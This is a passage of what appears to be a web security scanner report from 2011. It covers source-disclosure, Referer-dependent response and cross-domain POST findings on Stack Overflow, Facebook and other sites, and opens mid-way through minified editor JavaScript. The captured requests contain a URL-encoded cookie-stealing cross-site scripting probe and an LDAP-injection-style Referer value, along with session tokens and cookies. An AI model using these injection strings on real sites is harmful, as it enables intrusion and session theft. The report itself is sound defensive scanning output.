Ctrl+I";I.XShift="-20px";I.textOp=c.doItalic;p(I,true);F.appendChild(I);var X=document.createElement("li");X.className="wmd-spacer";X.id="wmd-spacer1";F.appendChild(X);var R=document.createElement("li");R.className="wmd-button";R.id="wmd-link-button";R.title="Hyperlink <a> Ctrl+L";R.XShift="-40px";R.textOp=function(ac,ab){return c.doLinkOrImage(ac,ab,false)};p(R,true);F.appendChild(R);var U=document.createElement("li");U.className="wmd-button";U.id="wmd-quote-button";U.title="Blockquote <blockquote> Ctrl+Q";U.XShift="-60px";U.textOp=c.doBlockquote;p(U,true);F.appendChild(U);var S=document.createElement("li");S.className="wmd-button";S.id="wmd-code-button";S.title="Code Sample <pre><code> Ctrl+K";S.XShift="-80px";S.textOp=c.doCode;p(S,true);F.appendChild(S);var G=document.createElement("li");G.className="wmd-button";G.id="wmd-image-button";G.title="Image <img> Ctrl+G";G.XShift="-100px";G.textOp=function(ac,ab){return c.doLinkOrImage(ac,ab,true)};p(G,true);F.appendChild(G);var P=document.createElement("li");P.className="wmd-spacer";P.id="wmd-spacer2";F.appendChild(P);var K=document.createElement("li");K.className="wmd-button";K.id="wmd-olist-button";K.title="Numbered List <ol> Ctrl+O";K.XShift="-120px";K.textOp=function(ac,ab){c.doList(ac,ab,true)};p(K,true);F.appendChild(K);var H=document.createElement("li");H.className="wmd-button";H.id="wmd-ulist-button";H.title="Bulleted List <ul> Ctrl+U";H.XShift="-140px";H.textOp=function(ac,ab){c.doList(ac,ab,false)};p(H,true);F.appendChild(H);var N=document.createElement("li");N.className="wmd-button";N.id="wmd-heading-button";N.title="Heading <h1>/<h2> Ctrl+H";N.XShift="-160px";N.textOp=c.doHeading;p(N,true);F.appendChild(N);var O=document.createElement("li");O.className="wmd-button";O.id="wmd-hr-button";O.title="Horizontal Rule <hr> Ctrl+R";O.XShift="-180px";O.textOp=c.doHorizontalRule;p(O,true);F.appendChild(O);var J=document.createElement("li");J.className="wmd-spacer";J.id="wmd-spacer3";F.appendChild(J);var W=document.createElement("li");W.className="wmd-button";W.id="wmd-undo-button";W.title="Undo - Ctrl+Z";W.XShift="-200px";W.execute=function(ab){ab.undo()};p(W,true);F.appendChild(W);var Q=document.createElement("li");Q.className="wmd-button";Q.id="wmd-redo-button";Q.title="Redo - Ctrl+Y";if(/win/.test(b.platform.toLowerCase())){Q.title="Redo - Ctrl+Y"}else{Q.title="Redo - Ctrl+Shift+Z"}Q.XShift="-220px";Q.execute=function(ab){ab.redo()};p(Q,true);F.appendChild(Q);var aa=document.createElement("li");aa.className="wmd-button";aa.id="wmd-help-button";aa.XShift="-240px";aa.isHelp=true;var M=document.createElement("a");M.href=f;M.target="_blank";M.title=m;aa.appendChild(M);p(aa,true);F.appendChild(aa);E()};var D=function(){if(/\?noundo/.test(d.location.href)){k.nativeUndo=true}if(!k.nativeUndo){y=new k.undoManager(function(){B();E()})}u();var F="keydown";if(a.isOpera){F="keypress"}h.addEvent(t,F,function(J){if((J.ctrlKey||J.metaKey)&&!J.altKey){var I=J.charCode||J.keyCode;var H=String.fromCharCode(I).toLowerCase();switch(H){case"b":s(document.getElementById("wmd-bold-button"));break;case"i":s(document.getElementById("wmd-italic-button"));break;case"l":s(document.getElementById("wmd-link-button"));break;case"q":s(document.getElementById("wmd-quote-button"));break;case"k":s(document.getElementById("wmd-code-button"));break;case"g":s(document.getElementById("wmd-image-button"));break;case"o":s(document.getElementById("wmd-olist-button"));break;case"u":s(document.getElementById("wmd-ulist-button"));break;case"h":s(document.getElementById("wmd-heading-button"));break;case"r":s(document.getElementById("wmd-hr-button"));break;case"y":s(document.getElementById("wmd-redo-button"));break;case"z":if(J.shiftKey){s(document.getElementById("wmd-redo-button"))}else{s(document.getElementById("wmd-undo-button"))}break;default:return}if(J.preventDefault){J.preventDefault()}if(top.event){top.event.returnValue=false}}});h.addEvent(t,"keyup",function(H){if(H.shiftKey&&!H.ctrlKey&&!H.metaKey){var I=H.charCode||H.keyCode;if(I===13){fakeButton={};fakeButton.textOp=c.doAutoindent;s(fakeButton)}}});if(a.isIE){h.addEvent(t,"keydown",function(H){var I=H.keyCode;if(I===27){return false}})}if(t.form){var G=t.form.onsubmit;t.form.onsubmit=function(){z();if(G){return G.apply(this,arguments)}}}};var z=function(){if(k.showdown){var F=new k.showdown.converter()}var H=t.value;var G=function(){t.value=H};if(!/markdown/.test(k.wmd_env.output.toLowerCase())){if(F){t.value=F.makeHtml(H);top.setTimeout(G,0)}}return true};this.undo=function(){if(y){y.undo()}};this.redo=function(){if(y){y.redo()}};var x=function(){D()};this.destroy=function(){if(y){y.destroy()}if(q.parentNode){q.parentNode.removeChild(q)}if(t){t.style.marginTop=""}top.clearInterval(v)};x()};k.TextareaState=function(){var q=this;var p=k.panels.input;this.init=function(){if(!h.isVisible(p)){return}this.setInputAreaSelectionStartEnd();this.scrollTop=p.scrollTop;if(!this.text&&p.selectionStart||p.selectionStart===0){this.text=p.value}};this.setInputAreaSelection=function(){if(!h.isVisible(p)){return}if(p.selectionStart!==undefined&&!a.isOpera){p.focus();p.selectionStart=q.start;p.selectionEnd=q.end;p.scrollTop=q.scrollTop}else{if(d.selection){if(d.activeElement&&d.activeElement!==p){return}p.focus();var r=p.createTextRange();r.moveStart("character",-p.value.length);r.moveEnd("character",-p.value.length);r.moveEnd("character",q.end);r.moveStart("character",q.start);r.select()}}};this.setInputAreaSelectionStartEnd=function(){if(p.selectionStart||p.selectionStart===0){q.start=p.selectionStart;q.end=p.selectionEnd}else{if(d.selection){q.text=h.fixEolChars(p.value);var s;if(k.ieRetardedClick&&k.ieCachedRange){s=k.ieCachedRange;k.ieRetardedClick=false}else{s=d.selection.createRange()}var r=h.fixEolChars(s.text);var u="\x07";var v=u+r+u;s.text=v;var w=h.fixEolChars(p.value);s.moveStart("character",-v.length);s.text=r;q.start=w.indexOf(u);q.end=w.lastIndexOf(u)-u.length;var t=q.text.length-h.fixEolChars(p.value).length;if(t){s.moveStart("character",-r.length);while(t--){r+="\n";q.end+=1}s.text=r}this.setInputAreaSelection()}}};this.restore=function(){if(q.text!=undefined&&q.text!=p.value){p.value=q.text}this.setInputAreaSelection();p.scrollTop=q.scrollTop};this.getChunks=function(){var r=new k.Chunks();r.before=h.fixEolChars(q.text.substring(0,q.start));r.startTag="";r.selection=h.fixEolChars(q.text.substring(q.start,q.end));r.endTag="";r.after=h.fixEolChars(q.text.substring(q.end));r.scrollTop=q.scrollTop;return r};this.setChunks=function(r){r.before=r.before+r.startTag;r.after=r.endTag+r.after;if(a.isOpera){r.before=r.before.replace(/\n/g,"\r\n");r.selection=r.selection.replace(/\n/g,"\r\n");r.after=r.after.replace(/\n/g,"\r\n")}this.start=r.before.length;this.end=r.before.length+r.selection.length;this.text=r.before+r.selection+r.after;this.scrollTop=r.scrollTop};this.init()};k.Chunks=function(){};k.Chunks.prototype.findTags=function(r,p){var q=this;var s;if(r){s=h.extendRegExp(r,"","$");this.before=this.before.replace(s,function(t){q.startTag=q.startTag+t;return""});s=h.extendRegExp(r,"^","");this.selection=this.selection.replace(s,function(t){q.startTag=q.startTag+t;return""})}if(p){s=h.extendRegExp(p,"","$");this.selection=this.selection.replace(s,function(t){q.endTag=t+q.endTag;return""});s=h.extendRegExp(p,"^","");this.after=this.after.replace(s,function(t){q.endTag=t+q.endTag;return""})}};k.Chunks.prototype.trimWhitespace=function(p){this.selection=this.selection.replace(/^(\s*)/,"");if(!p){this.before+=j.$1}this.selection=this.selection.replace(/(\s*)$/,"");if(!p){this.after=j.$1+this.after}};k.Chunks.prototype.skipLines=function(p,q,t){if(p===undefined){p=1}if(q===undefined){q=1}p++;q++;var s;var r;if(navigator.userAgent.match(/Chrome/)){"X".match(/()./)}this.selection=this.selection.replace(/(^\n*)/,"");this.startTag=this.startTag+j.$1;this.selection=this.selection.replace(/(\n*$)/,"");this.endTag=this.endTag+j.$1;this.startTag=this.startTag.replace(/(^\n*)/,"");this.before=this.before+j.$1;this.endTag=this.endTag.replace(/(\n*$)/,"");this.after=this.after+j.$1;if(this.before){s=r="";while(p--){s+="\\n?";r+="\n"}if(t){s="\\n*"}this.before=this.before.replace(new j(s+"$",""),r)}if(this.after){s=r="";while(q--){s+="\\n?";r+="\n"}if(t){s="\\n*"}this.after=this.after.replace(new j(s,""),r)}};c.prefixes="(?:\\s{4,}|\\s*>|\\s*-\\s+|\\s*\\d+\\.|=|\\+|-|_|\\*|#|\\s*\\[[^\n]]+\\]:)";c.unwrap=function(q){var p=new j("([^\\n])\\n(?!(\\n|"+c.prefixes+"))","g");q.selection=q.selection.replace(p,"$1 $2")};c.wrap=function(r,q){c.unwrap(r);var p=new j("(.{1,"+q+"})( +|$\\n?)","gm");r.selection=r.selection.replace(p,function(t,s){if(new j("^"+c.prefixes,"").test(t)){return t}return s+"\n"});r.selection=r.selection.replace(/\s+$/,"")};c.doBold=function(q,p){return c.doBorI(q,p,2,"strong text")};c.doItalic=function(q,p){return c.doBorI(q,p,1,"emphasized text")};c.doBorI=function(u,t,s,x){u.trimWhitespace();u.selection=u.selection.replace(/\n{2,}/g,"\n");u.before.search(/(\**$)/);var q=j.$1;u.after.search(/(^\**)/);var p=j.$1;var r=Math.min(q.length,p.length);if((r>=s)&&(r!=2||s!=1)){u.before=u.before.replace(j("[*]{"+s+"}$",""),"");u.after=u.after.replace(j("^[*]{"+s+"}",""),"")}else{if(!u.selection&&p){u.after=u.after.replace(/^([*_]*)/,"");u.before=u.before.replace(/(\s?)$/,"");var w=j.$1;u.before=u.before+p+w}else{if(!u.selection&&!p){u.selection=x}var v=s<=1?"*":"**";u.before=u.before+v;u.after=v+u.after}}return};c.stripLinkDefs=function(p,q){p=p.replace(/^[ ]{0,3}\[(\d+)\]:[ \t]*\n?[ \t]*<?(\S+?)>?[ \t]*\n?[ \t]*(?:(\n*)["(](.+?)[")][ \t]*)?(?:\n+|$)/gm,function(r,s,t,u,v){q[s]=r.replace(/\s*$/,"");if(u){q[s]=r.replace(/["(](.+?)[")]$/,"");return u+v}return""});return p};c.addLinkDef=function(u,r){var q=0;var x={};u.before=c.stripLinkDefs(u.before,x);u.selection=c.stripLinkDefs(u.selection,x);u.after=c.stripLinkDefs(u.after,x);var p="";var s=/(\[)((?:\[[^\]]*\]|[^\[\]])*)(\][ ]?(?:\n[ ]*)?\[)(\d+)(\])/g;var t=function(y){q++;y=y.replace(/^[ ]{0,3}\[(\d+)\]:/," ["+q+"]:");p+="\n"+y};var w=function(z,B,D,C,A,y){D=D.replace(s,w);if(x[A]){t(x[A]);return B+D+C+q+y}return z};u.before=u.before.replace(s,w);if(r){t(r)}else{u.selection=u.selection.replace(s,w)}var v=q;u.after=u.after.replace(s,w);if(u.after){u.after=u.after.replace(/\n*$/,"")}if(!u.after){u.selection=u.selection.replace(/\n*$/,"")}u.after+="\n\n"+p;return v};c.doLinkOrImage=function(r,q,p){r.trimWhitespace();r.findTags(/\s*!?\[/,/\][ ]?(?:\n[ ]*)?(\[.*?\])?/);if(r.endTag.length>1){r.startTag=r.startTag.replace(/!?\[/,"");r.endTag="";c.addLinkDef(r,null)}else{if(/\n\n/.test(r.selection)){c.addLinkDef(r,null);return}var s=function(u){if(u!==null){r.startTag=r.endTag="";var v=" [999]: "+u;var t=c.addLinkDef(r,v);r.startTag=p?"![":"[";r.endTag="]["+t+"]";if(!r.selection){if(p){r.selection="enter image description here"}else{r.selection="enter link description here"}}}q()};if(p){if(!(window.enableImageUploads===undefined)){h.uploadDialog(s)}else{h.prompt(g,e,s)}}else{h.prompt(o,i,s)}return true}};h.makeAPI=function(){k.wmd={};k.wmd.editor=k.editor;k.wmd.previewManager=k.previewManager};h.startEditor=function(){var q;var p;k.panels=new k.PanelCollection();p=new k.previewManager();var r=p.refresh;q=new k.editor(r);p.refresh(true)};k.previewManager=function(){var K=this;var x;var A;var B;var y;var p;var s;var r=3000;var H="delayed";var E=function(M,N){h.addEvent(M,"input",N);M.onpaste=N;M.ondrop=N;h.addEvent(M,"keypress",N);h.addEvent(M,"keydown",N)};var u=function(){var M=0;if(top.innerHeight){M=top.pageYOffset}else{if(d.documentElement&&d.documentElement.scrollTop){M=d.documentElement.scrollTop}else{if(d.body){M=d.body.scrollTop}}}return M};var C=function(){if(!k.panels.preview&&!k.panels.output){return}var O=k.panels.input.value;if(O&&O==p){return}else{p=O}var N=new Date().getTime();if(!x&&k.showdown){x=new k.showdown.converter()}if(x){O=Attacklab.prePreviewHtmlHook(O);O=x.makeHtml(O);O=Attacklab.postPreviewHtmlHook(O)}var M=new Date().getTime();y=M-N;q(O);s=O};var J=function(){if(B){top.clearTimeout(B);B=undefined}if(H!=="manual"){var M=0;if(H==="delayed"){M=y}if(M>r){M=r}B=top.setTimeout(C,M)}};var G=function(M){if(M.scrollHeight<=M.clientHeight){return 1}return M.scrollTop/(M.scrollHeight-M.clientHeight)};var w=function(){if(k.panels.preview){k.panels.preview.scrollTop=(k.panels.preview.scrollHeight-k.panels.preview.clientHeight)*G(k.panels.preview)}if(k.panels.output){k.panels.output.scrollTop=(k.panels.output.scrollHeight-k.panels.output.clientHeight)*G(k.panels.output)}};this.refresh=function(M){if(M){p="";C()}else{J()}};this.processingTime=function(){return y};this.output=function(){return s};var z=true;var I=function(N){var M=N.replace(/<[^<>]*>?/gi,L);var O=Attacklab.postSafeHtmlHook(M);return O};var t=/^(<\/?(b|blockquote|code|del|dd|dl|dt|em|h1|h2|h3|i|kbd|li|ol|p|pre|s|sup|sub|strong|strike|ul)>|<(br|hr)\s?\/?>)$/i;var F=/^(<a\shref="((https?|ftp):\/\/|\/)[-A-Za-z0-9+&@#\/%?=~_|!:,.;]+"(\stitle="[^"<>
...[SNIP]...

19.5. http://sstatic.net/js/master.min.js previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://sstatic.net
Path:	/js/master.min.js

Issue detail

The application appears to disclose some server-side source code written in PHP and ASP.

Request

GET /js/master.min.js?v=e8eb0725b4bd HTTP/1.1
Host: sstatic.net
Proxy-Connection: keep-alive
Referer: http://stackoverflow.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: application/x-javascript
Last-Modified: Sun, 30 Jan 2011 11:16:01 GMT
Accept-Ranges: bytes
ETag: "64b5eb136fc0cb1:0"
Vary: Accept-Encoding
Date: Sun, 30 Jan 2011 15:11:28 GMT
Content-Length: 57791

if(top!=self){top.location.replace(document.location);alert("For security reasons, framing is not allowed; click OK to remove the frames.")}$(function(){$.ajaxSetup({cache:false});master.bind_hidePopu
...[SNIP]...
</.test(ap)?"default-markup":"default-code"}return af[ao]}l(u,["default-code"]);l(A([],[[Y,/^[^<?]+/],[e,/^<!\w[^>]*(?:>|$)/],[j,/^<\!--[\s\S]*?(?:-\->|$)/],["lang-",/^<\?([\s\S]+?)(?:\?>|$)/],["lang-",/^<%([\s\S]+?)(?:%>|$)/],[an,/^(?:<[%?]|[%?]>
...[SNIP]...

20. Referer-dependent response previous next
There are 3 instances of this issue:

http://stackauth.com/auth/global/read
http://stackoverflow.com/users/login/global/request
http://www.facebook.com/plugins/like.php

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Referer-based access controls, where the application assumes that if you have arrived from one privileged location then you are authorised to access another privileged location. These controls can be trivially defeated by supplying an accepted Referer header in requests for the vulnerable function.
Attempts to prevent cross-site request forgery attacks by verifying that requests to perform privileged actions originated from within the application itself and not from some external location. Such defenses are not robust - methods have existed through which an attacker can forge or mask the Referer header contained within a target user's requests, by leveraging client-side technologies such as Flash and other techniques.
Delivery of Referer-tailored content, such as welcome messages to visitors from specific domains, search-engine optimisation (SEO) techniques, and other ways of tailoring the user's experience. Such behaviours often have no security impact; however, unsafe processing of the Referer header may introduce vulnerabilities such as SQL injection and cross-site scripting. If parts of the document (such as META keywords) are updated based on search engine queries contained in the Referer header, then the application may be vulnerable to persistent code injection attacks, in which search terms are manipulated to cause malicious content to appear in responses served to other application users.

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defenses against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defenses against malicious input should be employed here as for any other kinds of user-supplied data.

20.1. http://stackauth.com/auth/global/read previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://stackauth.com
Path:	/auth/global/read

Request 1

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Sun, 30 Jan 2011 15:12:17 GMT
Content-Length: 1199

<html><head>
<script type='text/javascript'>
var data = {"ReadSession":"http://stackauth.com/auth/global/read-session","Request":"lNFEJmiMWRvnZEvOWYpUnSipo9yf2IIGqtPflTj16ER0fdpDutY+Txasmc8BrnyYDeYjNVIsJs2AVBeBqTJirA==","Nonce":"on9FTQAAAACIr5drBee4yA==","Referrer":"http://stackoverflow.com/","StorageName":"GlobalLogin"};

var obj = localStorage.getItem(data.StorageName);
if(obj != null) {
var req = new XMLHttpRequest();
req.open('POST', data.ReadSession+'?request='+encodeURIComponent(data.Request)+'&nonce='+encodeURIComponent(data.Nonce)+'&seriesAndToken='+encodeURIComponent(obj), false);
req.send(null);

if(req.status == 200){
top.postMessage(req.responseText, data.Referrer);
}else{
top.postMessage('No Session', data.Referrer);
}
}else{
top.postMessage('No Local Storage', data.Referrer);
}
</script>
</head><body></body></html>

Request 2

GET /auth/global/read?request=lNFEJmiMWRvnZEvOWYpUnSipo9yf2IIGqtPflTj16ER0fdpDutY%2BTxasmc8BrnyYDeYjNVIsJs2AVBeBqTJirA%3D%3D&nonce=on9FTQAAAACIr5drBee4yA%3D%3D HTTP/1.1
Host: stackauth.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Sun, 30 Jan 2011 15:12:34 GMT
Content-Length: 269

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Not Found
</title></head>
<body>
<h1>Not Found</h1>
</body>
</html>

20.2. http://stackoverflow.com/users/login/global/request previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://stackoverflow.com
Path:	/users/login/global/request

Request 1

POST /users/login/global/request HTTP/1.1
Host: stackoverflow.com
Proxy-Connection: keep-alive
Referer: http://stackoverflow.com/
Origin: http://stackoverflow.com
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gauthed=1
Content-Length: 0

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/json; charset=utf-8
Vary: Accept-Encoding
Date: Sun, 30 Jan 2011 15:12:18 GMT
Content-Length: 135

{"token":"bEqbP8qpPMaMgpbj3SQniJpkt2/zUMQczGJvclBBnImHw7sB+kAuN2ERFOJROf2mS521rLttOVhYHlzNhYypqw==","nonce":"0n9FTQAAAACWxoj5YZ9Otw=="}

Request 2

POST /users/login/global/request HTTP/1.1
Host: stackoverflow.com
Proxy-Connection: keep-alive
Origin: http://stackoverflow.com
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gauthed=1
Content-Length: 0

Response 2

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/plain
Date: Sun, 30 Jan 2011 15:12:27 GMT
Content-Length: 0

20.3. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/plugins/like.php

Request 1

GET /plugins/like.php?layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&href=http://www.facebook.com/pages/Technolog/108546889203630 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://technolog.msnbc.redacted/_news/2011/01/28/*)(sn=*/?GT1=43001
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; __utmz=87286159.1296076830.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=87286159.599939457.1296076830.1296076830.1296076830.1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Devents.cbs6albany.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fevents.cbs6albany.com%252Falbany-ny%252Fevents%252Fperforming%252Bartsa1daa%2525253cscript%2525253ealert%25252528document.cookie%25252529%2525253c%2525252fscript%2525253ef524f3c9c61%26extra_2%3DUS

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-Cnection: close
Date: Sun, 30 Jan 2011 01:34:56 GMT
Content-Length: 7962

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="connect_widget_4d44c040884fa9333092808" class="connect_widget button_count" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider"><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_button_count_including hidden_elem"><table class="uiGrid connect_widget_button_count_summary" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="thumbs_up"></div></td><td><div class="undo hidden_elem"><label class="undo_button uiCloseButton uiCloseButtonSmall uiCloseButtonSmall" for="u129656_1"><input title="Remove" type="button" id="u129656_1" /></label></div></td><td><div class="summary_text">6K people</div></td></tr></tbody></table></td><td class="connect_widget_button_count_excluding"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="connect_widget_button_count_nub"></div></td><td><div class="connect_widget_button_count_count">6K</div></td></tr></tbody></table></td></tr></table></div><script type="text/javascript">
Env={module:"like_widget",impid:"97644637",user:0,locale:"en_US",method:"GET",dev:0,start:(new Date()).getTime(),ps_limit:5,ps_ratio:4,svn_rev:337553,vip:"66.220.149.18",static_base:"http:\/\/static.ak.fbcdn.net\/",www_base:"http:\/\/www.facebook.com\/",tlds:["com"],rep_lag:20,pc:{"m":"1.0.4","l":"1.0.4","axi":true,"j":true,"bsz":16},fb_dtsg:"FwYsq",lhsh:"0807f",tracking_domain:"http:\/\/pixel.facebook.com",silent_oops_errors:"1",ajax_threshold:"1",use_css_import_in_ie:"1",ajaxpipe_enabled:"1",chat_fe_rewrite:"1"};
</script>
<script type="text/javascript">Bootloader.setResourceMap({"JOgNK":{"type":"css","permanent":1,"src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/yc\/r\/JJt3yB2LDLj.css"},"s8NLO":{"type":"css","permanent":1,"src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/yF\/r\/ezx-gKmDx-P.css"},"wDcHm":{"type":"css"
...[SNIP]...

Request 2

GET /plugins/like.php?layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&href=http://www.facebook.com/pages/Technolog/108546889203630 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; __utmz=87286159.1296076830.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=87286159.599939457.1296076830.1296076830.1296076830.1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Devents.cbs6albany.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fevents.cbs6albany.com%252Falbany-ny%252Fevents%252Fperforming%252Bartsa1daa%2525253cscript%2525253ealert%25252528document.cookie%25252529%2525253c%2525252fscript%2525253ef524f3c9c61%26extra_2%3DUS

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-Cnection: close
Date: Sun, 30 Jan 2011 01:36:14 GMT
Content-Length: 7890

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="connect_widget_4d44c08e7fb6b0212357453" class="connect_widget button_count" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider"><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_button_count_including hidden_elem"><table class="uiGrid connect_widget_button_count_summary" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="thumbs_up"></div></td><td><div class="undo hidden_elem"><label class="undo_button uiCloseButton uiCloseButtonSmall uiCloseButtonSmall" for="u137452_1"><input title="Remove" type="button" id="u137452_1" /></label></div></td><td><div class="summary_text">6K people</div></td></tr></tbody></table></td><td class="connect_widget_button_count_excluding"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="connect_widget_button_count_nub"></div></td><td><div class="connect_widget_button_count_count">6K</div></td></tr></tbody></table></td></tr></table></div><script type="text/javascript">
Env={module:"like_widget",impid:"6ccd5234",user:0,locale:"en_US",method:"GET",dev:0,start:(new Date()).getTime(),ps_limit:5,ps_ratio:4,svn_rev:337553,vip:"66.220.149.18",static_base:"http:\/\/static.ak.fbcdn.net\/",www_base:"http:\/\/www.facebook.com\/",tlds:["com"],rep_lag:20,pc:{"m":"1.0.4","l":"1.0.4","axi":true,"j":true,"bsz":16},fb_dtsg:"FwYsq",lhsh:"0807f",tracking_domain:"http:\/\/pixel.facebook.com",silent_oops_errors:"1",ajax_threshold:"1",use_css_import_in_ie:"1",ajaxpipe_enabled:"1",chat_fe_rewrite:"1"};
</script>
<script type="text/javascript">Bootloader.setResourceMap({"JOgNK":{"type":"css","permanent":1,"src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/yc\/r\/JJt3yB2LDLj.css"},"s8NLO":{"type":"css","permanent":1,"src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/yF\/r\/ezx-gKmDx-P.css"},"wDcHm":{"type":"css"
...[SNIP]...

21. Cross-domain POST previous next
There are 10 instances of this issue:

http://astrocenter.astrology.redacted/msn/Default.aspx
http://curmudgeons.blogspot.com/
http://fancybox.net/
https://login.live.com/resetpw.srf
http://news.discovery.com/
http://planetary.org/blog
http://www.dailygrail.com/
http://www.hobbyspace.com/
http://www.slate.com/id/2282444/
http://www.transterrestrial.com/

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.

21.1. http://astrocenter.astrology.redacted/msn/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://astrocenter.astrology.redacted
Path:	/msn/Default.aspx

Issue detail

The page contains a form which POSTs data to the domain store.astrocenter.com. The form contains the following fields:

De
eDaily
eWeekly
eTarot
eLove
btnGoEmailSignupDaily

Request

GET /msn/Default.aspx HTTP/1.1
